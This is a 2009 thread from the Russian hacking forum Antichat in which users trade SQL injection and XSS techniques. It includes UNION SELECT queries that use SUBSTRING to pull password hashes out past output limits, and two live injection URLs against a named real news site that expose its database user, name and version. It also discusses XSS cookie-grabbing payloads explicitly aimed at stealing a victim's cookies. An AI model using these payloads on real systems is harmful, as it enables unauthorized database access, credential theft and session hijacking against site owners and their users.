HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.03.2009, 02:11
Stalingrad
Познающий
Регистрация: 18.03.2006
Сообщений: 47
Провел на форуме:
311345

Репутация: 9
По умолчанию

А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 )

И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?:
Printable fields : {1},3,4,5,6,7

Последний раз редактировалось Stalingrad; 11.03.2009 в 02:14..
 
Ответить с цитированием

  #2  
Старый 11.03.2009, 02:27
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

Цитата:
Сообщение от Stalingrad  
А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 )

И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?:
Printable fields : {1},3,4,5,6,7
Printable fields ( ака печатное поле)
скобками ты выделяешь столбец в который выводить данные

{1},3,4,5,6,7 - в перввый
 
Ответить с цитированием

  #3  
Старый 11.03.2009, 02:22
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

2 Jokester,что делать если в скуле урезаются длина запроса
 
Ответить с цитированием

  #4  
Старый 11.03.2009, 02:33
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
По умолчанию

Цитата:
Сообщение от Gorev  
2 Jokester,что делать если в скуле урезаются длина запроса
запроса или вывода ? если вывода то через substring ... а может я и ошибаюсь ...
 
Ответить с цитированием

  #5  
Старый 11.03.2009, 02:37
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

вывода извиняюсь, через substring я знаю, есть ли другой способ?
 
Ответить с цитированием

  #6  
Старый 11.03.2009, 03:44
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.

union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

заменить на

union+select+1,2,3,4,5,6,7,8,9,0,1,2,3

для начала. Даже на этом пример съекономилось 4 символа
 
Ответить с цитированием

  #7  
Старый 11.03.2009, 04:26
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
По умолчанию

Цитата:
Сообщение от Pashkela  
сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.

union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

заменить на

union+select+1,2,3,4,5,6,7,8,9,0,1,2,3

для начала. Даже на этом пример съекономилось 4 символа
мы тут про вывод
 
Ответить с цитированием

  #8  
Старый 11.03.2009, 10:20
Seshh
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175

Репутация: 0
Question

Вопрос: Если XSS был найден посредством подставления вот этого скрипта: "><script>alert(document.cookie)</script>

то дальнейшие мои действия для изъятия куки у жертвы такиеже, как и в случае еслибы я уязвимость нашол вот этим скриптом: "><script>alert(XSS)</script> ???
 
Ответить с цитированием

  #9  
Старый 11.03.2009, 10:42
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994

Репутация: 104
По умолчанию

Да.Такие-же действия.
 
Ответить с цитированием

  #10  
Старый 11.03.2009, 12:18
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Gorev
Не вполне понял вопрос.

Если скрипт обрезает выводимые данные, допустим до 15 символов, то , как тут уже сказали, SUBSTRING. Выглядеть это будет примерно так(для хеша 32):

1-е 15 символов
union select SUBSTRING(passwd, 0, 15) from user
c 15 по 30
SUBSTRING(passwd, 15, 30)
и остальные 2
SUBSTRING(passwd, 30, 32)

========================

Иногда встречается "наложение" вывода, ну например сдесь:
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,User(),Database(),Ve rsion()),2,3,4,5,6,7,8,9/*
Вот так нам не видно юзера

http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,0x6C6F6C6F6C6F,User( ),Database(),Version()),2,3,4,5,6,7,8,9/*
А вот так видно всё

========================

Если на вопрос не ответил, поподробнее опиши проблему, что выводится, что не выводится, при каких условиях, и чем тебя SUBSTRING не устраивает
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.